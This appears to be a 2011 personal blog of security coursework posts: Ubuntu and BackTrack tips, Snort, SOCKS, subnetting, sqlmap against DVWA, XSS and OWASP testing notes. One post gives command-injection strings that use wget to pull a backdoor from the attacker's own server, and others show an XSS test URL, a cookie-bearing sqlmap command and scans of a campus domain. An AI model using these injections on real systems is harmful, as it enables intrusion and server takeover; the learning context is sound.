Tuesday, December 6, 2011

Error when Updating Ubuntu

The problem :
W: GPG error: http://archive.canonical.com jaunty Release: The following signatures were invalid: BADSIG 40976EAF437D05B5 Ubuntu Archive Automatic Signing Key <ftpmaster@ubuntu.com>

W: GPG error: http://security.ubuntu.com jaunty-security Release: The following signatures were invalid: BADSIG 40976EAF437D05B5 Ubuntu Archive Automatic Signing Key <ftpmaster@ubuntu.com>

W: GPG error: http://us.archive.ubuntu.com jaunty Release: The following signatures were invalid: BADSIG 40976EAF437D05B5 Ubuntu Archive Automatic Signing Key <ftpmaster@ubuntu.com>

W: GPG error: http://us.archive.ubuntu.com jaunty-updates Release: The following signatures were invalid: BADSIG 40976EAF437D05B5 Ubuntu Archive Automatic Signing Key <ftpmaster@ubuntu.com>
 
How to fix :
apt-get clean
cd /var/lib/apt
mv lists lists.old
mkdir -p lists/partial
apt-get clean
apt-get update

Tuesday, September 20, 2011

S N O R T



Snort is simple software that is very useful for observing activity on a computer network. Snort can be used as a lightweight Network Intrusion Detection System (NIDS); it uses a rule system to detect and log attacks on a computer network. Given rules that describe the signature of an attack, Snort can detect and log that attack. The software is open source under the GNU General Public License [GNU89], so it is free to use, and the source code can be obtained and modified if necessary. Snort was initially written for Unix-based operating systems, but a Windows version has also been made, and Snort is now cross-platform.
Snort is still command-line based, which can be troublesome for users who are used to a Graphical User Interface (GUI). For that reason, third parties provide GUIs for Snort, for example IDScenter for Microsoft Windows and the PHP-based Acid, which can be accessed from a web browser.
Snort has a rule language that is relatively easy to learn and flexible.
Snort has a database of rules.
Snort can log directly to a database system, for example MySQL, PostgreSQL and MS

Saturday, September 3, 2011

Install Google Chrome in Backtrack 5

Many people ask how to install Google Chrome in BackTrack.
This time I will tell you how to install Google Chrome in BackTrack 5. Follow the steps below :
1.   apt-get install chromium-browser
You can also use Synaptic and select chromium-browser.
2.   cd /usr/lib/chromium-browser
3.   Replace geteuid with getppid using hexedit, with the following command :
hexedit chromium-browser
Then press Tab to switch to string mode. Then press Ctrl+S and type geteuid. Replace geteuid with getppid, then press Ctrl+X to exit!
4.   Enjoy your Google Chrome!!!

Monday, July 25, 2011

Installing Backdoor in the Database through SQL Injection


Now, I will explain how to install a backdoor in the database through SQL Injection. For this practice, I use DVWA as the web application. DVWA is a ready-made web application covering SQL Injection and SQL Injection (Blind).
First, I choose SQL Injection as my target. In the user id form, I just type admin and then click submit, but nothing happens. Then, I copy the address (from the site after I submit admin as the user id). I use sqlmap and try this command :

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit"

but this fails to get the database. Then, I try to use Tamper Data from the browser. From Tamper Data, I get the cookie and copy it. With sqlmap, I scan again with this command :

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4"

From the result of the command above, I can see that the parameter id is vulnerable and might be injectable.

Wednesday, July 20, 2011

SOCKS, SOCKS v4, SOCKS v5 and HTTP

SOCKS is an Internet protocol that routes network packets between a client and server through a proxy server. Socks5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server will proxy TCP connections to an arbitrary IP address as well as providing a means for UDP packets to be forwarded.
One use of SOCKS is to allow connections to be made through a firewall.

SOCKS4 is the first widely adopted version of the protocol.  It suffers from a couple of problems which have been remedied in SOCKS4A and SOCKS5, namely :
·       It requires clients to know the IP address (e.g. 123.123.123.123) of the servers they want to connect to.  This means, in most cases, that they must be able to resolve domain names.
·        There is no authentication.  A client only requires a user-name to be able to access SOCKS4 services.
SOCKS4A is a simple extension to SOCKS4 which solves the former problem, but not the latter.
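
The difference between a SOCKS4 and a SOCKS4A request described above, as an added example that is not part of the original post. The byte layout follows the published SOCKS4 and SOCKS4A protocol descriptions; the function names, the user name and the host name are constructed for illustration.

```python
import ipaddress
import struct

CMD_CONNECT = 0x01  # SOCKS4 command code for CONNECT


def build_socks4(dst_ip, dst_port, user_id=b""):
    """SOCKS4: the client must already know the destination IPv4 address."""
    ip = ipaddress.IPv4Address(dst_ip).packed
    # user_id is only a name; nothing in the request proves who sent it.
    return struct.pack("!BBH", 4, CMD_CONNECT, dst_port) + ip + user_id + b"\x00"


def build_socks4a(hostname, dst_port, user_id=b""):
    """SOCKS4A: send the placeholder address 0.0.0.1 and append the host
    name, so the proxy resolves it instead of the client."""
    head = struct.pack("!BBH", 4, CMD_CONNECT, dst_port) + bytes([0, 0, 0, 1])
    return head + user_id + b"\x00" + hostname.encode("ascii") + b"\x00"


def parse_request(data):
    """Parse a SOCKS4/SOCKS4A request the way a proxy or a log parser would."""
    if len(data) < 9:
        raise ValueError("request too short")
    version, command, port = struct.unpack("!BBH", data[:4])
    if version != 4:
        raise ValueError("not a SOCKS4 request")
    ip = data[4:8]
    user_end = data.find(b"\x00", 8)
    if user_end == -1:
        raise ValueError("unterminated user id")
    result = {"command": command, "port": port,
              "user_id": data[8:user_end],
              "ip": str(ipaddress.IPv4Address(ip)), "hostname": None}
    # 0.0.0.x with x != 0 marks a SOCKS4A request that carries a host name.
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:
        host_end = data.find(b"\x00", user_end + 1)
        if host_end == -1:
            raise ValueError("unterminated host name")
        result["hostname"] = data[user_end + 1:host_end].decode("ascii")
        result["ip"] = None
    return result


if __name__ == "__main__":
    # Constructed sample requests, not captured traffic.
    for req in (build_socks4("123.123.123.123", 80, b"alice"),
                build_socks4a("example.org", 443, b"alice")):
        print(req.hex(), parse_request(req))
```

In both requests the user name travels as a plain string with no credential attached, which is the missing authentication that SOCKS4A leaves unsolved.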

SOCKS5 is the most recent version of the SOCKS protocol.  It solves both the problems of

Hacking System Through Web Application

People who build web sites often do not pay attention to the security of their site. This is dangerous and harmful. Through a web application, we can attack the server.
In this post, I will tell about my experience of hacking a server through a web application.
First, we must search for a vulnerability in the web application. On this site, I found a command execution vulnerability.
Then, I try to ping the IP address (in this case, I already have the IP address of the server).
After I enter the IP address, the result appears below. It means I can do something with this command execution.
Next, I try to upload an image through the command execution, but there is no response and nothing happens. Then, I try to upload a backdoor, and the response is the same as when I uploaded the image.
To upload a file through command execution we can use this command :
ip_target | wget our_ip_address/file.jpg -O 123.jpg (for this command we must start our apache, and the file must be saved to /var/www/)
or we can use this command :
;wget (layout file)/file.php -O 123.php

Thursday, July 14, 2011

.htaccess

Hypertext Access, commonly shortened to htaccess, is a configuration file which controls the directory it is placed in and all the subdirectories underneath it. It’s an incredibly useful feature which allows webmasters to control how many aspects of their website work. You can redirect pages, change the extensions of pages, password protect directories and much, much more.
In this htaccess guide I will show you some of the basic tricks and tips which will help you with your website.

So what is htaccess?
The htaccess file is a configuration file which is used on Apache based web servers to control many features of the server. The file itself is just a small basic text file and can be edited via your host's file manager, or alternatively you can download the file, edit it and re-upload it.
If you have installed a script before then chances are you have had to edit the .htaccess file at one point or another. The .htaccess file gives you a lot of control and lets you easily redirect pages, password protect directories and much more. Before I go through some tutorials which show you how to use htaccess, I think it is necessary to show you how you edit the file.

Friday, July 8, 2011

Suhosin

Suhosin is part of the Hardened PHP project, a project to make PHP more secure. Suhosin is a PHP extension that checks various things such as suspicious input (to detect SQL injection, for example), protects against bugs in the Zend engine, makes the default PHP settings more secure (e.g. turning off the remote include feature by default), etc. More details about its features and usage can be read on the Suhosin homepage.

For the sake of better security, PHP installations on the hosting server have been equipped with Suhosin since January 2007.

PHP equipped with Suhosin is not a "silver bullet" or a perfect, comprehensive solution. The most important factor in maintaining security remains in your hands as a programmer / developer: keep programming securely and keep the PHP applications / libraries you install up to date.

Wednesday, June 29, 2011

Multi Level Login 2

I got a chance to look for a solution to multi level login 2. The following is a screenshot from multi level login 2 :


SUBNETTING

Subnetting is a technique that allows network administrators to use the available 32-bit IP addresses more efficiently. Subnetting lets a network scale further without being bound to the fixed IP classes A, B, and C. With subnetting, you can create a network with more realistic limits on the number of hosts needed. Subnetting provides a more flexible way to determine which part of a 32-bit IP address represents the network ID and which part represents the host ID.
With standard IP address classes, only 3 network ID lengths are possible: 8 bits for class A, 16 bits for class B, and 24 bits for class C. Subnetting allows you to choose an arbitrary number of bits to be used as the network ID.
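
The network ID / host ID split described above, as an added example that is not part of the original post. The function names and the sample address 172.16.5.130 are constructed for illustration.

```python
import ipaddress


def classful_prefix(address):
    """Network ID length fixed by the address class (A=8, B=16, C=24 bits)."""
    first_octet = int(ipaddress.IPv4Address(address)) >> 24
    if first_octet < 128:
        return 8
    if first_octet < 192:
        return 16
    if first_octet < 224:
        return 24
    raise ValueError("class D/E addresses have no network/host split")


def split(address, prefix):
    """Split a 32-bit address into network ID and host ID for any prefix length."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be between 0 and 32")
    value = int(ipaddress.IPv4Address(address))
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    host_bits = 32 - prefix
    return {
        "mask": str(ipaddress.IPv4Address(mask)),
        "network": str(ipaddress.IPv4Address(value & mask)),
        "host_id": value & ~mask & 0xFFFFFFFF,
        # The all-zeros and all-ones host IDs are reserved (network, broadcast).
        "usable_hosts": max(2 ** host_bits - 2, 0),
    }


if __name__ == "__main__":
    addr = "172.16.5.130"                 # constructed sample address
    print(split(addr, classful_prefix(addr)))  # class B: 16-bit network ID
    print(split(addr, 26))                # subnetted: 26-bit network ID
```

With the class B default the address belongs to one network of 65534 usable hosts; with a 26-bit network ID the same address falls in 172.16.5.128 with 62 usable hosts.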
Two main reasons for doing subnetting :

  1. Allocating the limited IP addresses more efficiently. If the Internet is limited to the addresses in class A, B, and C, each network will have 254, 65,000, or 16 million IP addresses for host devices. Although there are many networks with more than 254 hosts, only a few networks (if you do not want to say none) which has hosted as

Thursday, June 23, 2011

Webgoat Installation

WebGoat is based on the concept of teaching a user a real world lesson and then asking the user to demonstrate their understanding by exploiting a real vulnerability on the local system. The system is even clever enough to provide hints and show the user cookies, parameters and the underlying Java code if they choose. Examples of lessons include SQL injection to a fake credit card database, where the user creates the attack and steals the credit card numbers.

This time, I will tell you how to install WebGoat.
Follow the steps below :
1.      Download webgoat Here
2.      Download java Here
3.      Extract webgoat with this command :
root@bt:~# 7z x WebGoat-OWASP_Standard-5.3_RC1.7z
Information :
7z = used to unpack WebGoat-OWASP_Standard-5.3_RC1.7z
x = used to extract files with full paths

Sunday, June 19, 2011

XSS Reflected and XSS Stored

What is a Reflected Cross Site Scripting vulnerability
The malicious user has discovered that a field within a website or web application holds an XSS vulnerability. This malicious user then crafts a way to use the vulnerability to execute something malicious against some unknown user. Reflected XSS vulnerabilities occur when an unknowing user is directed by the malicious user to a web application that has an XSS vulnerability. Once the unknowing user gets to the web site or application, the malicious user's attack is executed.
The attack is crafted as a series of URL parameters that are sent via a URL. The malicious user then sends his/her malicious URL with the URL parameters to unknowing users. This is typically sent by email, instant messages, blogs or forums, or any other possible methods.
You might think that the unknowing user would not click on a link that looked like it does something bad. But the reflected attack can occur using JavaScript, so that once an email is opened or even the website is viewed the attack is executed. Additionally the attack is typically URL encoded, hex coded, or uses some other encoding method to try and make the URL appear as something valid.
What is a Stored Cross Site Scripting vulnerability

DVWA - CSRF (High)

This time, I will share my experience with DVWA. I have tried to complete DVWA at the high level but I'm still confused. I still do not understand the purpose of this problem. These are some pictures of what I've done :


The picture above is a page from CSRF at the high level.


Friday, June 17, 2011

Difference of SQL Injection with SQL Injection (Blind)

Blind SQL Injection is a database exploitation technique that differs from normal SQL injection. A regular SQL injection returns a value, but a blind SQL injection returns no value at all; instead we learn the values by trial and error, testing whether a value is true or false ...
GT here using the command
mid () = almost the same function as substring ()
char () = is a variable of character

Friday, June 10, 2011

Data Validation Testing

TESTING FOR REFLECTED CROSS SITE SCRIPTING (OWASP-DV-001)
Reflected Cross-site Scripting (XSS) is another name for non-persistent XSS, where the attack doesn't load with the vulnerable web application but is originated by the victim loading the offending URI. In this article we will see some ways to test a web application for this kind of vulnerability.
The following are the steps I have done :
1.      OWASP-DV-001
In this phase, I tried to enter the following URL :
http://akakom.ac.id/index.php?user=<script>alert(latihan)</script>, and here is the result :



Wednesday, June 8, 2011

Cookie and Session

Understanding COOKIES
Cookies are data files written to your hard disk by a web server and used to identify the user, so that when the user revisits the site, the site will be able to recognize them.
Functions of cookies :
1.    Helping the web site to "remember" who we are and set the appropriate preferences, so that the user is instantly recognized when revisiting the web site.
2.    Eliminating the need to register again on the web site when accessing it (that site only); cookies help keep the user logged in to the web server.
3.    Allowing the web site to track the web surfing patterns of users and to know which favorite sites are frequently visited.

Types of Cookies
1.    Non-persistent (session) cookies. A cookie that disappears when the user closes the browser; it is usually used for the 'shopping carts' of online stores to browse the items

Tuesday, June 7, 2011

Session Management, Authorization Testing, Business Logic Testing

This time I will tell you what I have done on the topic of session management.

This describes how to analyse a Session Management Schema, with the goal to understand how the Session Management mechanism has been developed and if it is possible to break it to bypass the user session. It explains how to test the security of session tokens issued to the client's browser: how to reverse engineer a cookie, and how to manipulate cookies to hijack a session.

The following are the steps I have done :
1. Session Management-001
    - open browser
    - on the browser, click edit => Preferences => Advanced => Network => Setting => on the manual proxy configuration, use 127.0.0.1 as HTTP proxy and use 8008 as port.
    - open webscarab

Sunday, June 5, 2011

Introduction to Computer Security

There is no precise definition of 'safe' or 'unsafe' for a computer system. The development of science and technology leads to this.
Security is something that allows the system and users to :
·         Verify the identity of the entity
·         Maintain valuable information (personal data, passwords, etc.)

Computer Security Purpose :
·         To keep secret data / information safe (confidentiality)
·         To prevent data from being changed by unauthorized parties (integrity)
·         To ensure that data is available when needed

Some solutions to make our computer more secure are below :
·         Update OS
·         Use antivirus (more than one)
·         Update your antivirus databases
     

Saturday, June 4, 2011

Configuration Management Testing

This time I will tell you about material related to OWASP Configuration Management Testing. After reading the OWASP Testing Guide, my group and I tried to practice the material on Configuration Management Testing. The following are the steps we have done :
1.      SSL / TLS Testing
With the konsole we write this command :
root@bt:~# nmap -F -sV akakom.ac.id
Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-04 19:08 WIT
Nmap scan report for akakom.ac.id (110.76.151.2)
Host is up (0.97s latency).
Not shown: 87 closed ports
PORT    STATE    SERVICE      VERSION
22/tcp  open     ssh          OpenSSH 5.5 (protocol 2.0)
25/tcp  open     smtp         Sendmail 8.14.4/8.14.4
53/tcp  open     domain
80/tcp  open     http         Apache httpd

GPG Tutorial

Network security is very important, but awareness of it is still lacking. If we have an important file on our computer, we must protect that file from others.
This time I want to tell about PGP. PGP can protect our files and our email from others. These are the steps to use PGP to protect our email.
If we use Linux as our OS, we can type the following in the konsole :
root@bt:~# gpg --gen-key
gpg (GnuPG) 1.4.10; Copyright (C) 2008 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Please select what kind of key you want:
   (1) RSA and RSA (default)
   (2) DSA and Elgamal
   (3) DSA (sign only)
   (4) RSA (sign only)

Friday, June 3, 2011

Network Security Material

This time, I want to tell about something that I got from the material this afternoon. My friends and I were invited to learn about network security on our campus.
Network security is very important, but many of us underestimate it.
In this case we are required to think like an attacker, because as an attacker we can find holes or weaknesses and fix them to close or reduce the gaps in our network security.
There are several stages or steps that can guide us in network security :
-         Information gathering
In this section we can collect information about our target, such as the OS used by the target, server, port, etc.
-         Configuration management testing
-         Authentication testing
-         Session management
-         Authorization testing
-         Data validation testing
-         And so on.

Thursday, June 2, 2011

INFORMATION GATHERING

This time I will tell about my first exercise in information gathering.
1.      OWASP-IG-001
Black box testing :
by using the console, I write this command :
--2011-06-02 09:48:22-- http://www.akakom.ac.id/robots.txt
Resolving www.akakom.ac.id... 110.76.151.4
Connecting to www.akakom.ac.id|110.76.151.4|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 304 [text/plain]
Saving to: `robots.txt'

100%[=============================================================>] 304 --.-K/s in0s

2011-06-02 09:48:22 (25.2 MB/s) - `robots.txt' saved [304/304]